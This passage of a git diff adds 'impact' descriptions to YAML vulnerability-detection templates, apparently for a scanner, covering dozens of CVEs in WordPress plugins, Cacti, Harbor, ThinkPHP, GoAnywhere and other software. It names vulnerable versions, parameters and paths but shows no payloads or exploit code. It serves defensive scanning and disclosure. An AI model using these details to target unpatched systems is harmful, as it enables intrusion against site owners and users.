remediation: | Upgrade to a patched version of WBCE CMS or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml index d67fa08ebf..580dad2f65 100644 --- a/http/cves/2022/CVE-2022-45354.yaml +++ b/http/cves/2022/CVE-2022-45354.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords) + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks or unauthorized access. remediation: | Update to the latest version of the Download Monitor plugin (4.7.60) or apply the provided patch to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-45805.yaml b/http/cves/2022/CVE-2022-45805.yaml index 582761084a..a60bf7adc3 100644 --- a/http/cves/2022/CVE-2022-45805.yaml +++ b/http/cves/2022/CVE-2022-45805.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Paytm Payment Gateway plugin through 2.7.3 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: Update to version 2.7.7 or a newer patched version. reference: - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-3-auth-sql-injection-sqli-vulnerability diff --git a/http/cves/2022/CVE-2022-45835.yaml b/http/cves/2022/CVE-2022-45835.yaml index d40fe660b5..8735b64b81 100644 --- a/http/cves/2022/CVE-2022-45835.yaml +++ b/http/cves/2022/CVE-2022-45835.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to send arbitrary HTTP requests from the server, potentially leading to unauthorized access to internal resources or performing actions on behalf of the server. remediation: Fixed in version 2.0.0. reference: - https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf diff --git a/http/cves/2022/CVE-2022-45917.yaml b/http/cves/2022/CVE-2022-45917.yaml index 60dd833485..10d0a95bbe 100644 --- a/http/cves/2022/CVE-2022-45917.yaml +++ b/http/cves/2022/CVE-2022-45917.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ILIAS eLearning before 7.16 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Upgrade to ILIAS eLearning version 7.16 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-46020.yaml b/http/cves/2022/CVE-2022-46020.yaml index c10858d4eb..edeea54e13 100644 --- a/http/cves/2022/CVE-2022-46020.yaml +++ b/http/cves/2022/CVE-2022-46020.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WBCE CMS v1.5.4 can implement getshell by modifying the upload file type. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to a patched version of WBCE CMS v1.5.5 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-46071.yaml b/http/cves/2022/CVE-2022-46071.yaml index 074c2393a1..4d4010440e 100644 --- a/http/cves/2022/CVE-2022-46071.yaml +++ b/http/cves/2022/CVE-2022-46071.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | There is SQL Injection vulnerability at Helmet Store Showroom v1.0 Login Page. This vulnerability can be exploited to bypass admin access. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml index e5f77e224f..80b9cc66e7 100644 --- a/http/cves/2022/CVE-2022-46073.yaml +++ b/http/cves/2022/CVE-2022-46073.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Helmet Store Showroom 1.0 is vulnerable to Cross Site Scripting (XSS). + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-46169.yaml b/http/cves/2022/CVE-2022-46169.yaml index a78ac4b0a0..f882553c32 100644 --- a/http/cves/2022/CVE-2022-46169.yaml +++ b/http/cves/2022/CVE-2022-46169.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. remediation: | Upgrade Cacti to version 1.2.23 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-46381.yaml b/http/cves/2022/CVE-2022-46381.yaml index c999f74e9d..a90cd7719b 100644 --- a/http/cves/2022/CVE-2022-46381.yaml +++ b/http/cves/2022/CVE-2022-46381.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or update provided by the vendor to fix the XSS vulnerability in the Linear eMerge E3-Series. reference: diff --git a/http/cves/2022/CVE-2022-46443.yaml b/http/cves/2022/CVE-2022-46443.yaml index b50863f36f..94d833ba75 100644 --- a/http/cves/2022/CVE-2022-46443.yaml +++ b/http/cves/2022/CVE-2022-46443.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Bangresto 1.0 is vulnberable to SQL Injection via the itemqty%5B%5D parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire application and underlying database. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-46463.yaml b/http/cves/2022/CVE-2022-46463.yaml index 2074edbf42..f61dbfa00a 100644 --- a/http/cves/2022/CVE-2022-46463.yaml +++ b/http/cves/2022/CVE-2022-46463.yaml @@ -6,6 +6,8 @@ info: severity: high description: | An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data stored in Harbor. remediation: | Upgrade Harbor to a version higher than 2.5.3 to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml index b9a92660cc..cf6647a820 100644 --- a/http/cves/2022/CVE-2022-46934.yaml +++ b/http/cves/2022/CVE-2022-46934.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | kkFileView 4.1.0 is susceptible to cross-site scripting via the url parameter at /controller/OnlinePreviewController.java. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of kkFileView or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2022/CVE-2022-47002.yaml b/http/cves/2022/CVE-2022-47002.yaml index c87f3accd0..db47c757b7 100644 --- a/http/cves/2022/CVE-2022-47002.yaml +++ b/http/cves/2022/CVE-2022-47002.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Masa CMS 7.2, 7.3, and 7.4-beta are susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system. remediation: | Apply the latest security patch or update provided by the vendor to fix the authentication bypass vulnerability in Masa CMS. reference: diff --git a/http/cves/2022/CVE-2022-47003.yaml b/http/cves/2022/CVE-2022-47003.yaml index 3ee933bddc..999dcab05f 100644 --- a/http/cves/2022/CVE-2022-47003.yaml +++ b/http/cves/2022/CVE-2022-47003.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Mura CMS before 10.0.580 is susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Mura CMS application. remediation: | Upgrade Mura CMS to version 10.0.580 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-47615.yaml b/http/cves/2022/CVE-2022-47615.yaml index 031ccd3df9..1669762c80 100644 --- a/http/cves/2022/CVE-2022-47615.yaml +++ b/http/cves/2022/CVE-2022-47615.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive files, remote code execution, or information disclosure. remediation: | Upgrade to the latest version of LearnPress Plugin (4.2.0 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-47945.yaml b/http/cves/2022/CVE-2022-47945.yaml index 27025e8b5e..5b9c2d6c4b 100644 --- a/http/cves/2022/CVE-2022-47945.yaml +++ b/http/cves/2022/CVE-2022-47945.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php. + impact: | + This vulnerability can lead to unauthorized access, data leakage, and remote code execution. remediation: | Apply the latest security patches and updates provided by the Thinkphp framework. reference: diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml index 8c6113c600..b91e449d50 100644 --- a/http/cves/2022/CVE-2022-47966.yaml +++ b/http/cves/2022/CVE-2022-47966.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system. remediation: | Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-47986.yaml b/http/cves/2022/CVE-2022-47986.yaml index fd4175d965..f2854d017e 100644 --- a/http/cves/2022/CVE-2022-47986.yaml +++ b/http/cves/2022/CVE-2022-47986.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | IBM Aspera Faspex through 4.4.2 Patch Level 1 is susceptible to remote code execution via a YAML deserialization flaw. This can allow an attacker to send a specially crafted obsolete API call and thereby execute arbitrary code, obtain sensitive data, and/or execute other unauthorized operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: The obsolete API call was removed in 4.4.2 PL2. This vulnerability can be remediated by upgrading to either 4.4.2 PL2 or 5.x. reference: - https://blog.assetnote.io/2023/02/02/pre-auth-rce-aspera-faspex/ diff --git a/http/cves/2022/CVE-2022-48012.yaml b/http/cves/2022/CVE-2022-48012.yaml index d45b1d5b30..ca9640685c 100644 --- a/http/cves/2022/CVE-2022-48012.yaml +++ b/http/cves/2022/CVE-2022-48012.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS 0.9.7 contains a cross-site scripting vulnerability via the component /opencats/index.php?m=settings&a=ajax_tags_upd. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-48165.yaml b/http/cves/2022/CVE-2022-48165.yaml index f28847931e..32fb1c691b 100644 --- a/http/cves/2022/CVE-2022-48165.yaml +++ b/http/cves/2022/CVE-2022-48165.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations. + impact: | + The vulnerability can lead to unauthorized access, data leakage, or unauthorized actions on the affected device. remediation: | Apply the latest firmware update provided by the vendor to fix the access control issue. reference: diff --git a/http/cves/2022/CVE-2022-4897.yaml b/http/cves/2022/CVE-2022-4897.yaml index 6ed061333a..7f45555df8 100644 --- a/http/cves/2022/CVE-2022-4897.yaml +++ b/http/cves/2022/CVE-2022-4897.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 8.8.3. reference: - https://wpscan.com/vulnerability/7b0eeafe-b9bc-43b2-8487-a23d3960f73f diff --git a/http/cves/2023/CVE-2023-0099.yaml b/http/cves/2023/CVE-2023-0099.yaml index 45fba91329..b083350a40 100644 --- a/http/cves/2023/CVE-2023-0099.yaml +++ b/http/cves/2023/CVE-2023-0099.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + impact: | + Successful exploitation of this vulnerability can lead to session hijacking, defacement of websites, theft of sensitive information, and potential remote code execution. remediation: Fixed in version 115 reference: - https://wpscan.com/vulnerability/fd50f2d6-e420-4220-b485-73f33227e8f8 diff --git a/http/cves/2023/CVE-2023-0126.yaml b/http/cves/2023/CVE-2023-0126.yaml index 0f2fc78f8a..442df66a64 100644 --- a/http/cves/2023/CVE-2023-0126.yaml +++ b/http/cves/2023/CVE-2023-0126.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the affected device, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-0236.yaml b/http/cves/2023/CVE-2023-0236.yaml index 5ffd50bc83..9803c69f5b 100644 --- a/http/cves/2023/CVE-2023-0236.yaml +++ b/http/cves/2023/CVE-2023-0236.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.0.10. reference: - https://wpscan.com/vulnerability/503835db-426d-4b49-85f7-c9a20d6ff5b8 diff --git a/http/cves/2023/CVE-2023-0261.yaml b/http/cves/2023/CVE-2023-0261.yaml index 458a7aa48f..2a79a65f29 100644 --- a/http/cves/2023/CVE-2023-0261.yaml +++ b/http/cves/2023/CVE-2023-0261.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary SQL queries on the WordPress database, potentially leading to unauthorized access, data manipulation, or privilege escalation. remediation: Fixed in version 10.8. reference: - https://wpscan.com/vulnerability/6a3b6752-8d72-4ab4-9d49-b722a947d2b0 diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index 2868378f31..51583eb2ae 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the target system. remediation: | Upgrade PyLoad to a version that is not affected by this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-0448.yaml b/http/cves/2023/CVE-2023-0448.yaml index 18287debda..e35727906c 100644 --- a/http/cves/2023/CVE-2023-0448.yaml +++ b/http/cves/2023/CVE-2023-0448.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 4.3 and above reference: - https://wpscan.com/vulnerability/1f24db34-f608-4463-b4ee-9bc237774256 diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml index 215d0c79be..1385f69d71 100644 --- a/http/cves/2023/CVE-2023-0514.yaml +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of the Membership Database software or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2023/CVE-2023-0562.yaml b/http/cves/2023/CVE-2023-0562.yaml index c5b5f90068..b12171faea 100644 --- a/http/cves/2023/CVE-2023-0562.yaml +++ b/http/cves/2023/CVE-2023-0562.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-0563.yaml b/http/cves/2023/CVE-2023-0563.yaml index a8a1b009da..4e4fd300ad 100644 --- a/http/cves/2023/CVE-2023-0563.yaml +++ b/http/cves/2023/CVE-2023-0563.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml index b46c50a689..4b004693e5 100644 --- a/http/cves/2023/CVE-2023-0630.yaml +++ b/http/cves/2023/CVE-2023-0630.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database, potentially exposing sensitive information. remediation: Fixed in version 4.9.3.3 reference: - https://wpscan.com/vulnerability/b82bdd02-b699-4527-86cc-d60b56ab0c55 diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml index 13f97fc05b..9e8bf2481f 100644 --- a/http/cves/2023/CVE-2023-0669.yaml +++ b/http/cves/2023/CVE-2023-0669.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. This stems from a pre-authentication command injection vulnerability in the License Response Servlet. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-0942.yaml b/http/cves/2023/CVE-2023-0942.yaml index c1ddcfb5fd..084859a91d 100644 --- a/http/cves/2023/CVE-2023-0942.yaml +++ b/http/cves/2023/CVE-2023-0942.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Japanized for WooCommerce plugin before 2.5.5 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.5.5. reference: - https://wpscan.com/vulnerability/71aa9460-6dea-49cc-946c-d7d4bf723511 diff --git a/http/cves/2023/CVE-2023-0948.yaml b/http/cves/2023/CVE-2023-0948.yaml index e8714be571..a81897c803 100644 --- a/http/cves/2023/CVE-2023-0948.yaml +++ b/http/cves/2023/CVE-2023-0948.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Japanized for WooCommerce plugin before 2.5.8 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.5.8. reference: - https://wpscan.com/vulnerability/a78d75b2-85a0-41eb-9720-c726ca2e8718 diff --git a/http/cves/2023/CVE-2023-0968.yaml b/http/cves/2023/CVE-2023-0968.yaml index 0aff482ab3..a16e87d9f1 100644 --- a/http/cves/2023/CVE-2023-0968.yaml +++ b/http/cves/2023/CVE-2023-0968.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Watu Quiz plugin before 3.3.9.1 is susceptible to cross-site scripting. The plugin does not sanitize and escape some parameters, such as email, dn, date, and points, before outputting then back in a page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This exploit can be used against high-privilege users such as admin. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser. remediation: Fixed in version 3.3.9.1. reference: - https://wpscan.com/vulnerability/29008d1a-62b3-4f40-b5a3-134455b01595 diff --git a/http/cves/2023/CVE-2023-1080.yaml b/http/cves/2023/CVE-2023-1080.yaml index 1690769b75..9947da23cf 100644 --- a/http/cves/2023/CVE-2023-1080.yaml +++ b/http/cves/2023/CVE-2023-1080.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress GN Publisher plugin before 1.5.6 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. remediation: Fixed in version 1.5.6. reference: - https://wpscan.com/vulnerability/fcbcfb56-640d-4071-bc12-acac1b1e7a74 diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml index 4555a12e53..a5fbd9fdba 100644 --- a/http/cves/2023/CVE-2023-1177.yaml +++ b/http/cves/2023/CVE-2023-1177.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \..\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation could allow an attacker to read sensitive files on the server. remediation: | Upgrade Mlflow to version 2.2.1 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-1362.yaml b/http/cves/2023/CVE-2023-1362.yaml index 8ef85eb9ab..21e33c97f7 100644 --- a/http/cves/2023/CVE-2023-1362.yaml +++ b/http/cves/2023/CVE-2023-1362.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | This template checks for the presence of clickjacking prevention headers in the HTTP response, aiming to identify vulnerabilities related to the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2. + impact: | + An attacker can trick users into performing unintended actions on the vulnerable application. remediation: | Upgrade to version 2.0.2 or later to mitigate the Clickjacking vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-1434.yaml b/http/cves/2023/CVE-2023-1434.yaml index 287c6fe3a6..d8b99a0acd 100644 --- a/http/cves/2023/CVE-2023-1434.yaml +++ b/http/cves/2023/CVE-2023-1434.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml index b97f01e3d5..ba2ddf4b82 100644 --- a/http/cves/2023/CVE-2023-1454.yaml +++ b/http/cves/2023/CVE-2023-1454.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade Jeecg-boot to a patched version or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml index 4feab5de92..05e566cc38 100644 --- a/http/cves/2023/CVE-2023-1496.yaml +++ b/http/cves/2023/CVE-2023-1496.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade to Imgproxy version 3.14.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-1546.yaml b/http/cves/2023/CVE-2023-1546.yaml index fde98b4101..ca80fc8be8 100644 --- a/http/cves/2023/CVE-2023-1546.yaml +++ b/http/cves/2023/CVE-2023-1546.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 2.124 reference: - https://wpscan.com/vulnerability/bb065397-370f-4ee1-a2c8-20e4dc4415a0 diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml index 15c99c09d5..1428110985 100644 --- a/http/cves/2023/CVE-2023-1671.yaml +++ b/http/cves/2023/CVE-2023-1671.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by Sophos to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml index 